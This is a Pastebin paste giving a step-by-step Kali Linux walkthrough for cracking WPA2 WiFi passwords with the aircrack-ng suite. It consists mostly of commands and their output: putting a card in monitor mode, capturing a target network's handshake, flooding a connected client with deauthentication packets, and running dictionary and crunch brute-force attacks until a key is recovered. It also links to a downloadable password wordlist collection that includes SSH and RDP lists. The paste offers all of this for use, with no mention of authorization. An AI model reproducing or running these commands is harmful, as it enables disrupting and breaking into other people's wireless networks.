Advertisement
CyberSecurityNEPAL

WIFI CRACK TIPS KALI LINUX OS

Aug 8th, 2016
321
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 23.34 KB | None | 0 0
  1. ______ _ _ _ _ _____ _ _ _
  2. | ____| | | (_) | | | / ____| | | (_) |
  3. | |__ __ ___ __ | | ___ _| |_ | |__ _ _ | | _ _| |__ ___ _ __ ___ ___ ___ _ _ _ __ _| |_ _ _
  4. | __| \ \/ / '_ \| |/ _ \| | __| | '_ \| | | | | | | | | | '_ \ / _ \ '__/ __|/ _ \/ __| | | | '__| | __| | | |
  5. | |____ > <| |_) | | (_) | | |_ | |_) | |_| | | |___| |_| | |_) | __/ | \__ \ __/ (__| |_| | | | | |_| |_| |
  6. |______/_/\_\ .__/|_|\___/|_|\__| |_.__/ \__, | \_____\__, |_.__/ \___|_| |___/\___|\___|\__,_|_| |_|\__|\__, |
  7. | | __/ | __/ | __/ |
  8. |_| |___/ |___/ |___/
  9. -------------------------------------------------------------------------------------------------------------------------------------+ # Kali Linux can be used for many things, but it probably is best known for its ability to penetration test, or “hack,” WPA and WPA2 networks. There are hundreds of Windows applications that claim they can hack WPA; don’t get them! They’re just scams, used by professional hackers,into getting hacked themselves. There is only one way that hackers get into your network, and that is with a Linux-based OS, a wireless card capable of monitor mode, and aircrack-ng or similar. Also note that, even with these tools, Wi-Fi cracking is not for beginners. Playing with it requires basic knowledge of how WPA authentication works, and moderate familiarity with Kali Linux and its tools. If you feel you have the necessary skills, let’s begin
  10.  
  11. # Download Wordslist.master.rar file Nepaliwifi.txt,Wordslist.txt,ssh_passwd.txt,rdp_passlist.txt and many more txt file zip download
  12. # Download Link: http://www.mediafire.com/download/wrc43p4mj8fr89r/wordlist-master.rar
  13. COMMENTS PLEASE CONTACT ME: newfeedback@hotmail.com |
  14. -------------------------------------------------------------------------------------------------------------------------------------+
  15. ***************************************************************************************************************************************
  16. root@kali:~# ifconfig
  17. eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
  18. inet 192.168.230.135 netmask 255.255.255.0 broadcast 192.168.230.255
  19. inet6 fe80::20c:29ff:feaf:90ce prefixlen 64 scopeid 0x20<link>
  20. ether 00:0c:29:af:90:ce txqueuelen 1000 (Ethernet)
  21. RX packets 11 bytes 1388 (1.3 KiB)
  22. RX errors 0 dropped 0 overruns 0 frame 0
  23. TX packets 36 bytes 3062 (2.9 KiB)
  24. TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
  25.  
  26. lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
  27. inet 127.0.0.1 netmask 255.0.0.0
  28. inet6 ::1 prefixlen 128 scopeid 0x10<host>
  29. loop txqueuelen 0 (Local Loopback)
  30. RX packets 20 bytes 1200 (1.1 KiB)
  31. RX errors 0 dropped 0 overruns 0 frame 0
  32. TX packets 20 bytes 1200 (1.1 KiB)
  33. TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
  34.  
  35. wlan0: flags=4099<UP,BROADCAST,MULTICAST> mtu 1500
  36. ether 00:c0:ca:30:0e:fb txqueuelen 1000 (Ethernet)
  37. RX packets 0 bytes 0 (0.0 B)
  38. RX errors 0 dropped 0 overruns 0 frame 0
  39. TX packets 0 bytes 0 (0.0 B)
  40. TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
  41.  
  42.  
  43.  
  44. root@kali:~# airmon-ng check kill wlan0
  45.  
  46. You have entered an invalid channel "wlan0" which will be ignored
  47.  
  48. Killing these processes:
  49.  
  50. PID Name
  51. 697 dhclient
  52. 945 wpa_supplicant
  53.  
  54. root@kali:~# airmon-ng start wlan0
  55.  
  56.  
  57. PHY Interface Driver Chipset
  58.  
  59. phy0 wlan0 rtl8187 Realtek Semiconductor Corp. RTL8187
  60.  
  61. (mac80211 monitor mode vif enabled for [phy0]wlan0 on [phy0]wlan0mon)
  62. (mac80211 station mode vif disabled for [phy0]wlan0)
  63.  
  64. root@kali:~# airodump-ng wlan0mon
  65.  
  66.  
  67.  
  68.  
  69.  
  70. CH 9 ][ Elapsed: 36 s ][ 2016-02-26 22:39
  71.  
  72. BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
  73.  
  74. D8:5D:4C:C0:4C:45 -50 27 0 0 1 54 WPA2 TKIP PSK Android
  75.  
  76. BSSID STATION PWR Rate Lost Frames Probe
  77.  
  78. ctrl+c
  79.  
  80.  
  81.  
  82. root@kali:~# airodump-ng -c 1 --bssid D8:5D:4C:C0:4C:45 -w /root/Desktop/android wlan0mon
  83.  
  84.  
  85. CH 1 ][ Elapsed: 2 mins ][ 2016-02-26 22:46
  86.  
  87. BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
  88.  
  89. D8:5D:4C:C0:4C:45 -54 100 1733 167 0 1 54 WPA2 TKIP PSK Android
  90.  
  91. BSSID STATION PWR Rate Lost Frames Probe
  92.  
  93. D8:5D:4C:C0:4C:45 94:39:E5:C1:CC:71 -46 54 -54 1 96
  94.  
  95.  
  96.  
  97.  
  98.  
  99.  
  100. CH 1 ][ Elapsed: 12 mins ][ 2016-02-26 22:55 ][ WPA handshake: D8:5D:4C:C0:4C:45
  101.  
  102. BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
  103.  
  104. D8:5D:4C:C0:4C:45 -50 100 7056 1473 1 1 54 WPA2 TKIP PSK Android
  105.  
  106. BSSID STATION PWR Rate Lost Frames Probe
  107.  
  108. D8:5D:4C:C0:4C:45 94:39:E5:C1:CC:71 -45 54 -54 5 14081 Android
  109.  
  110.  
  111. ctrl+c
  112. root@kali:~#
  113.  
  114.  
  115. root@kali:~# aireplay-ng -0 0 -a D8:5D:4C:C0:4C:45 -c 94:39:E5:C1:CC:71 wlan0mon
  116. 22:53:21 Waiting for beacon frame (BSSID: D8:5D:4C:C0:4C:45) on channel 1
  117. 22:53:22 Sending 64 directed DeAuth. STMAC: [94:39:E5:C1:CC:71] [21|61 ACKs]
  118. 22:53:23 Sending 64 directed DeAuth. STMAC: [94:39:E5:C1:CC:71] [67|60 ACKs]
  119. 22:53:24 Sending 64 directed DeAuth. STMAC: [94:39:E5:C1:CC:71] [64|57 ACKs]
  120. 22:53:24 Sending 64 directed DeAuth. STMAC: [94:39:E5:C1:CC:71] [64|56 ACKs]
  121. 22:53:25 Sending 64 directed DeAuth. STMAC: [94:39:E5:C1:CC:71] [37|62 ACKs]
  122. 22:53:26 Sending 64 directed DeAuth. STMAC: [94:39:E5:C1:CC:71] [53|68 ACKs]
  123. 22:53:26 Sending 64 directed DeAuth. STMAC: [94:39:E5:C1:CC:71] [64|64 ACKs]
  124. 22:53:27 Sending 64 directed DeAuth. STMAC: [94:39:E5:C1:CC:71] [64|64 ACKs]
  125. 22:53:28 Sending 64 directed DeAuth. STMAC: [94:39:E5:C1:CC:71] [64|64 ACKs]
  126. 22:53:28 Sending 64 directed DeAuth. STMAC: [94:39:E5:C1:CC:71] [13|67 ACKs]
  127. 22:53:29 Sending 64 directed DeAuth. STMAC: [94:39:E5:C1:CC:71] [64|64 ACKs]
  128. 22:53:29 Sending 64 directed DeAuth. STMAC: [94:39:E5:C1:CC:71] [64|64 ACKs]
  129. 22:53:30 Sending 64 directed DeAuth. STMAC: [94:39:E5:C1:CC:71] [64|64 ACKs]
  130. 22:53:31 Sending 64 directed DeAuth. STMAC: [94:39:E5:C1:CC:71] [35|64 ACKs]
  131. 22:53:31 Sending 64 directed DeAuth. STMAC: [94:39:E5:C1:CC:71] [52|52 ACKs]
  132. 22:53:32 Sending 64 directed DeAuth. STMAC: [94:39:E5:C1:CC:71] [64|60 ACKs]
  133. 22:53:33 Sending 64 directed DeAuth. STMAC: [94:39:E5:C1:CC:71] [64|64 ACKs]
  134. 22:53:33 Sending 64 directed DeAuth. STMAC: [94:39:E5:C1:CC:71] [64|64 ACKs]
  135. 22:53:34 Sending 64 directed DeAuth. STMAC: [94:39:E5:C1:CC:71] [11|67 ACKs]
  136. 22:53:35 Sending 64 directed DeAuth. STMAC: [94:39:E5:C1:CC:71] [64|55 ACKs]
  137. 22:53:35 Sending 64 directed DeAuth. STMAC: [94:39:E5:C1:CC:71] [64|55 ACKs]
  138. 22:53:36 Sending 64 directed DeAuth. STMAC: [94:39:E5:C1:CC:71] [64|57 ACKs]
  139. 22:53:37 Sending 64 directed DeAuth. STMAC: [94:39:E5:C1:CC:71] [36|59 ACKs]
  140. 22:53:37 Sending 64 directed DeAuth. STMAC: [94:39:E5:C1:CC:71] [54|53 ACKs]
  141. 22:53:38 Sending 64 directed DeAuth. STMAC: [94:39:E5:C1:CC:71] [63|54 ACKs]
  142. 22:53:39 Sending 64 directed DeAuth. STMAC: [94:39:E5:C1:CC:71] [63|58 ACKs]
  143. 22:53:39 Sending 64 directed DeAuth. STMAC: [94:39:E5:C1:CC:71] [61|64 ACKs]
  144. 22:53:40 Sending 64 directed DeAuth. STMAC: [94:39:E5:C1:CC:71] [27|67 ACKs]
  145. 22:53:41 Sending 64 directed DeAuth. STMAC: [94:39:E5:C1:CC:71] [64|64 ACKs]
  146. 22:53:41 Sending 64 directed DeAuth. STMAC: [94:39:E5:C1:CC:71] [64|64 ACKs]
  147. 22:53:42 Sending 64 directed DeAuth. STMAC: [94:39:E5:C1:CC:71] [64|64 ACKs]
  148. 22:53:43 Sending 64 directed DeAuth. STMAC: [94:39:E5:C1:CC:71] [ 8|64 ACKs]
  149. 22:53:43 Sending 64 directed DeAuth. STMAC: [94:39:E5:C1:CC:71] [67|64 ACKs]
  150. 22:53:44 Sending 64 directed DeAuth. STMAC: [94:39:E5:C1:CC:71] [64|64 ACKs]
  151. 22:53:45 Sending 64 directed DeAuth. STMAC: [94:39:E5:C1:CC:71] [64|64 ACKs]
  152. 22:53:45 Sending 64 directed DeAuth. STMAC: [94:39:E5:C1:CC:71] [41|62 ACKs]
  153. 22:53:46 Sending 64 directed DeAuth. STMAC: [94:39:E5:C1:CC:71] [43|67 ACKs]
  154. 22:53:47 Sending 64 directed DeAuth. STMAC: [94:39:E5:C1:CC:71] [64|64 ACKs]
  155. 22:53:47 Sending 64 directed DeAuth. STMAC: [94:39:E5:C1:CC:71] [64|64 ACKs]
  156. 22:53:48 Sending 64 directed DeAuth. STMAC: [94:39:E5:C1:CC:71] [64|63 ACKs]
  157. 22:53:49 Sending 64 directed DeAuth. STMAC: [94:39:E5:C1:CC:71] [ 5|64 ACKs]
  158. 22:53:49 Sending 64 directed DeAuth. STMAC: [94:39:E5:C1:CC:71] [67|67 ACKs]
  159. 22:53:50 Sending 64 directed DeAuth. STMAC: [94:39:E5:C1:CC:71] [64|61 ACKs]
  160. 22:53:51 Sending 64 directed DeAuth. STMAC: [94:39:E5:C1:CC:71] [64|53 ACKs]
  161. 22:53:51 Sending 64 directed DeAuth. STMAC: [94:39:E5:C1:CC:71] [49|61 ACKs]
  162. 22:53:52 Sending 64 directed DeAuth. STMAC: [94:39:E5:C1:CC:71] [37|60 ACKs]
  163. 22:53:53 Sending 64 directed DeAuth. STMAC: [94:39:E5:C1:CC:71] [64|61 ACKs]
  164. 22:53:53 Sending 64 directed DeAuth. STMAC: [94:39:E5:C1:CC:71] [64|62 ACKs]
  165. 22:53:54 Sending 64 directed DeAuth. STMAC: [94:39:E5:C1:CC:71] [64|63 ACKs]
  166. 22:53:54 Sending 64 directed DeAuth. STMAC: [94:39:E5:C1:CC:71] [ 7|62 ACKs]
  167. 22:53:55 Sending 64 directed DeAuth. STMAC: [94:39:E5:C1:CC:71] [67|65 ACKs]
  168. 22:53:56 Sending 64 directed DeAuth. STMAC: [94:39:E5:C1:CC:71] [64|64 ACKs]
  169. 22:53:56 Sending 64 directed DeAuth. STMAC: [94:39:E5:C1:CC:71] [64|64 ACKs]
  170. 22:53:57 Sending 64 directed DeAuth. STMAC: [94:39:E5:C1:CC:71] [64|64 ACKs]
  171. 22:53:58 Sending 64 directed DeAuth. STMAC: [94:39:E5:C1:CC:71] [24|67 ACKs]
  172. 22:53:58 Sending 64 directed DeAuth. STMAC: [94:39:E5:C1:CC:71] [64|64 ACKs]
  173. 22:53:59 Sending 64 directed DeAuth. STMAC: [94:39:E5:C1:CC:71] [64|64 ACKs]
  174. 22:54:00 Sending 64 directed DeAuth. STMAC: [94:39:E5:C1:CC:71] [64|64 ACKs]
  175. 22:54:00 Sending 64 directed DeAuth. STMAC: [94:39:E5:C1:CC:71] [33|63 ACKs]
  176. 22:54:01 Sending 64 directed DeAuth. STMAC: [94:39:E5:C1:CC:71] [51|66 ACKs]
  177. 22:54:01 Sending 64 directed DeAuth. STMAC: [94:39:E5:C1:CC:71] [64|64 ACKs]
  178. 22:54:02 Sending 64 directed DeAuth. STMAC: [94:39:E5:C1:CC:71] [64|64 ACKs]
  179. 22:54:03 Sending 64 directed DeAuth. STMAC: [94:39:E5:C1:CC:71] [64|64 ACKs]
  180. 22:54:03 Sending 64 directed DeAuth. STMAC: [94:39:E5:C1:CC:71] [15|63 ACKs]
  181. 22:54:04 Sending 64 directed DeAuth. STMAC: [94:39:E5:C1:CC:71] [67|67 ACKs]
  182. 22:54:04 Sending 64 directed DeAuth. STMAC: [94:39:E5:C1:CC:71] [64|64 ACKs]
  183. 22:54:05 Sending 64 directed DeAuth. STMAC: [94:39:E5:C1:CC:71] [64|64 ACKs]
  184. 22:54:06 Sending 64 directed DeAuth. STMAC: [94:39:E5:C1:CC:71] [64|64 ACKs]
  185. 22:54:06 Sending 64 directed DeAuth. STMAC: [94:39:E5:C1:CC:71] [ 4|62 ACKs]
  186. 22:54:07 Sending 64 directed DeAuth. STMAC: [94:39:E5:C1:CC:71] [67|67 ACKs]
  187. 22:54:08 Sending 64 directed DeAuth. STMAC: [94:39:E5:C1:CC:71] [64|64 ACKs]
  188. 22:54:08 Sending 64 directed DeAuth. STMAC: [94:39:E5:C1:CC:71] [64|55 ACKs]
  189. 22:54:09 Sending 64 directed DeAuth. STMAC: [94:39:E5:C1:CC:71] [59|64 ACKs]
  190. 22:54:09 Sending 64 directed DeAuth. STMAC: [94:39:E5:C1:CC:71] [24|67 ACKs]
  191. 22:54:10 Sending 64 directed DeAuth. STMAC: [94:39:E5:C1:CC:71] [64|64 ACKs]
  192. 22:54:11 Sending 64 directed DeAuth. STMAC: [94:39:E5:C1:CC:71] [64|64 ACKs]
  193. 22:54:11 Sending 64 directed DeAuth. STMAC: [94:39:E5:C1:CC:71] [64|64 ACKs]
  194. 22:54:12 Sending 64 directed DeAuth. STMAC: [94:39:E5:C1:CC:71] [35|64 ACKs]
  195. 22:54:12 Sending 64 directed DeAuth. STMAC: [94:39:E5:C1:CC:71] [46|67 ACKs]
  196. 22:54:13 Sending 64 directed DeAuth. STMAC: [94:39:E5:C1:CC:71] [64|58 ACKs]
  197. 22:54:14 Sending 64 directed DeAuth. STMAC: [94:39:E5:C1:CC:71] [64|55 ACKs]
  198. 22:54:14 Sending 64 directed DeAuth. STMAC: [94:39:E5:C1:CC:71] [64|57 ACKs]
  199. 22:54:15 Sending 64 directed DeAuth. STMAC: [94:39:E5:C1:CC:71] [ 8|54 ACKs]
  200. 22:54:16 Sending 64 directed DeAuth. STMAC: [94:39:E5:C1:CC:71] [67|54 ACKs]
  201. 22:54:17 Sending 64 directed DeAuth. STMAC: [94:39:E5:C1:CC:71] [64|51 ACKs]
  202. 22:54:17 Sending 64 directed DeAuth. STMAC: [94:39:E5:C1:CC:71] [64|55 ACKs]
  203. 22:54:18 Sending 64 directed DeAuth. STMAC: [94:39:E5:C1:CC:71] [10|57 ACKs]
  204. 22:54:19 Sending 64 directed DeAuth. STMAC: [94:39:E5:C1:CC:71] [67|57 ACKs]
  205. 22:54:19 Sending 64 directed DeAuth. STMAC: [94:39:E5:C1:CC:71] [64|57 ACKs]
  206. 22:54:20 Sending 64 directed DeAuth. STMAC: [94:39:E5:C1:CC:71] [64|60 ACKs]
  207. 22:54:21 Sending 64 directed DeAuth. STMAC: [94:39:E5:C1:CC:71] [52|58 ACKs]
  208. 22:54:21 Sending 64 directed DeAuth. STMAC: [94:39:E5:C1:CC:71] [33|64 ACKs]
  209. 22:54:22 Sending 64 directed DeAuth. STMAC: [94:39:E5:C1:CC:71] [64|61 ACKs]
  210. 22:54:23 Sending 64 directed DeAuth. STMAC: [94:39:E5:C1:CC:71] [64|60 ACKs]
  211. 22:54:23 Sending 64 directed DeAuth. STMAC: [94:39:E5:C1:CC:71] [64|61 ACKs]
  212. 22:54:24 Sending 64 directed DeAuth. STMAC: [94:39:E5:C1:CC:71] [12|62 ACKs]
  213. 22:54:25 Sending 64 directed DeAuth. STMAC: [94:39:E5:C1:CC:71] [67|62 ACKs]
  214. 22:54:25 Sending 64 directed DeAuth. STMAC: [94:39:E5:C1:CC:71] [64|64 ACKs]
  215. 22:54:26 Sending 64 directed DeAuth. STMAC: [94:39:E5:C1:CC:71] [64|64 ACKs]
  216.  
  217. root@kali:~# aircrack-ng -a2 -b D8:5D:4C:C0:4C:45 -w /root/Desktop/Wordlist.txt /root/Desktop/*.cap
  218. Opening /root/Desktop/Wordlist-01.cap
  219. Reading packets, please wait...
  220.  
  221. Aircrack-ng 1.2 rc3
  222.  
  223.  
  224. [00:06:51] 478196 keys tested (1160.52 k/s)
  225.  
  226.  
  227. KEY FOUND! [ Nepal12345 ]
  228.  
  229.  
  230. Master Key : AB 3D 32 52 73 12 7C 05 32 96 7D 49 31 CF 0B A2
  231. 99 A9 80 89 DF 52 1A 38 29 21 AD 38 A3 36 D0 32
  232.  
  233. Transient Key : 1A 4A FF 46 87 56 9D CD 52 AC 7A D6 C5 F9 4C AC
  234. 4A 69 D5 1F E3 C5 8A 03 C0 29 D9 10 27 A3 0D 7F
  235. A9 B2 EF B1 FF E8 CE 93 59 C9 E0 80 AF D2 E2 C1
  236. 92 58 1E 52 12 B6 23 BF 5F BB D0 E5 4F B0 C8 C9
  237.  
  238. EAPOL HMAC : 14 83 E3 FC 99 09 DC 84 01 5F 7E 7F BE 07 7B 79
  239. ***************************************************************************************************************************************
  240. The different type WIFI CRACK KALI LINUX OS COMMAND LINE TO LEARNING/
  241. ***************************************************************************************************************************************
  242.  
  243.  
  244. ***************************************************************************************************************************************OTHER COMMAND KALI LINUX TRICKS
  245. NOTE: WHEN YOU USE COMMAND LINE "directed DeAuth -0" WHO ONE ACCESS TO THE ROUTER ITS DEATH TO BE CONNECT DATA TO ROUTER!
  246. ***************************************************************************************************************************************
  247.  
  248.  
  249. root@kali:~# airmon-ng check kill
  250.  
  251. root@kali:~# airmon-ng
  252.  
  253. root@kali:~# airmon-ng start wlan0
  254. -----------------------------------------------------
  255. root@kali:~# airodump-ng wlan0mon
  256. -----------------------------------------------------
  257. ctrl+c
  258.  
  259.  
  260. root@kali:~# airodump-ng --ignore-negative-one --bssid 00:00:00:00:00 -c 1 -w Android wlan0mon
  261. ****Android is cap file*****
  262.  
  263. root@kali:~# aireplay-ng --deauth 10 --ignore-negative-one -a 00:00:00:00:00 -c 11:22:33:44:55 wlan0mon
  264.  
  265. root@kali:~# crunch 8 8 abcdefghijklmnopqrstuvwxyz | aircrack-ng -b 00:00:00:00:00 Android-01.cap -w-
  266. ===============================================================================================================
  267. ===============================================================================================================
  268. root@kali:~# airmon-ng check kill
  269.  
  270. root@kali:~# airmon-ng start wlan0
  271. -----------------------------------------------------------------------------------
  272. root@kali:~# airodump-ng wlan0mon
  273. -----------------------------------------------------------------------------------
  274. ctrl+c
  275.  
  276. root@kali:~# airodump-ng -c 1 --bssid D8:5D:4C:C0:4C:45 -w /root/Desktop/Wordlist wlan0mon
  277. ---------------------------------------------------------------------------------------------
  278. CH 1 ][ Elapsed: 12 mins ][ 2016-02-26 22:55 ][ WPA handshake: D8:5D:4C:C0:4C:45
  279.  
  280. BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
  281. D8:5D:4C:C0:4C:45 -50 100 7056 1473 1 1 54 WPA2 TKIP PSK Android
  282.  
  283. ---------------------------------------------------------------------------------------------
  284.  
  285. root@kali:~# aireplay-ng -0 5 -a D8:5D:4C:C0:4C:45 -c 94:39:E5:C1:CC:71 wlan0mon
  286. ----------------------------------------------------------------------------------
  287. 22:53:21 Waiting for beacon frame (BSSID: D8:5D:4C:C0:4C:45) on channel 1
  288. 22:53:22 Sending 64 directed DeAuth. STMAC: [94:39:E5:C1:CC:71] [21|61 ACKs]
  289. 22:53:23 Sending 64 directed DeAuth. STMAC: [94:39:E5:C1:CC:71] [67|60 ACKs]
  290. 22:53:24 Sending 64 directed DeAuth. STMAC: [94:39:E5:C1:CC:71] [64|57 ACKs]
  291. 22:53:24 Sending 64 directed DeAuth. STMAC: [94:39:E5:C1:CC:71] [64|56 ACKs]
  292. 22:53:25 Sending 64 directed DeAuth. STMAC: [94:39:E5:C1:CC:71] [37|62 ACKs]
  293. 22:53:26 Sending 64 directed DeAuth. STMAC: [94:39:E5:C1:CC:71] [53|68 ACKs]
  294. 22:53:26 Sending 64 directed DeAuth. STMAC: [94:39:E5:C1:CC:71] [64|64 ACKs]
  295.  
  296. root@kali:~# aircrack-ng -a2 -b D8:5D:4C:C0:4C:45 -w /root/Desktop/Wordlist.txt /root/Desktop/*.cap
  297. ------------------------------------------------------------------------------------------------------------
  298. pening /root/Desktop/Wordlist-01.cap
  299. Reading packets, please wait...
  300.  
  301. Aircrack-ng 1.2 rc3
  302.  
  303.  
  304. [00:06:51] 478196 keys tested (1160.52 k/s)
  305.  
  306.  
  307. KEY FOUND! [ Nepal12345 ]
  308.  
  309.  
  310. Master Key : AB 3D 32 52 73 12 7C 05 32 96 7D 49 31 CF 0B A2
  311. 99 A9 80 89 DF 52 1A 38 29 21 AD 38 A3 36 D0 32
  312.  
  313. Transient Key : 1A 4A FF 46 87 56 9D CD 52 AC 7A D6 C5 F9 4C AC
  314. 4A 69 D5 1F E3 C5 8A 03 C0 29 D9 10 27 A3 0D 7F
  315. A9 B2 EF B1 FF E8 CE 93 59 C9 E0 80 AF D2 E2 C1
  316. 92 58 1E 52 12 B6 23 BF 5F BB D0 E5 4F B0 C8 C9
  317.  
  318. EAPOL HMAC : 14 83 E3 FC 99 09 DC 84 01 5F 7E 7F BE 07 7B 79
  319. ***************************************************************************************************************************************
  320. aireplay command help
  321. ----------------------
  322.  
  323. root@kali:~# aireplay-ng --help
  324.  
  325. Aireplay-ng 1.2 rc3 - (C) 2006-2015 Thomas d'Otreppe
  326. http://www.aircrack-ng.org
  327.  
  328. usage: aireplay-ng <options> <replay interface>
  329.  
  330. Filter options:
  331.  
  332. -b bssid : MAC address, Access Point
  333. -d dmac : MAC address, Destination
  334. -s smac : MAC address, Source
  335. -m len : minimum packet length
  336. -n len : maximum packet length
  337. -u type : frame control, type field
  338. -v subt : frame control, subtype field
  339. -t tods : frame control, To DS bit
  340. -f fromds : frame control, From DS bit
  341. -w iswep : frame control, WEP bit
  342. -D : disable AP detection
  343.  
  344. Replay options:
  345.  
  346. -x nbpps : number of packets per second
  347. -p fctrl : set frame control word (hex)
  348. -a bssid : set Access Point MAC address
  349. -c dmac : set Destination MAC address
  350. -h smac : set Source MAC address
  351. -g value : change ring buffer size (default: 8)
  352. -F : choose first matching packet
  353.  
  354. Fakeauth attack options:
  355.  
  356. -e essid : set target AP SSID
  357. -o npckts : number of packets per burst (0=auto, default: 1)
  358. -q sec : seconds between keep-alives
  359. -Q : send reassociation requests
  360. -y prga : keystream for shared key auth
  361. -T n : exit after retry fake auth request n time
  362.  
  363. Arp Replay attack options:
  364.  
  365. -j : inject FromDS packets
  366.  
  367. Fragmentation attack options:
  368.  
  369. -k IP : set destination IP in fragments
  370. -l IP : set source IP in fragments
  371.  
  372. Test attack options:
  373.  
  374. -B : activates the bitrate test
  375.  
  376. Source options:
  377.  
  378. -i iface : capture packets from this interface
  379. -r file : extract packets from this pcap file
  380.  
  381. Miscellaneous options:
  382.  
  383. -R : disable /dev/rtc usage
  384. --ignore-negative-one : if the interface's channel can't be determined,
  385. ignore the mismatch, needed for unpatched cfg80211
  386.  
  387. Attack modes (numbers can still be used):
  388.  
  389. --deauth count : deauthenticate 1 or all stations (-0)
  390. --fakeauth delay : fake authentication with AP (-1)
  391. --interactive : interactive frame selection (-2)
  392. --arpreplay : standard ARP-request replay (-3)
  393. --chopchop : decrypt/chopchop WEP packet (-4)
  394. --fragment : generates valid keystream (-5)
  395. --caffe-latte : query a client for new IVs (-6)
  396. --cfrag : fragments against a client (-7)
  397. --migmode : attacks WPA migration mode (-8)
  398. --test : tests injection and quality (-9)
  399.  
  400. --help : Displays this usage screen
  401. ***************************************************************************************************************************************
  402. WIFI CRACK TECHNI WIT KALI LINUX OS HAPPY CRACK AND ENJOY BY EXPLOIT BY CYBERSECURITY!
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement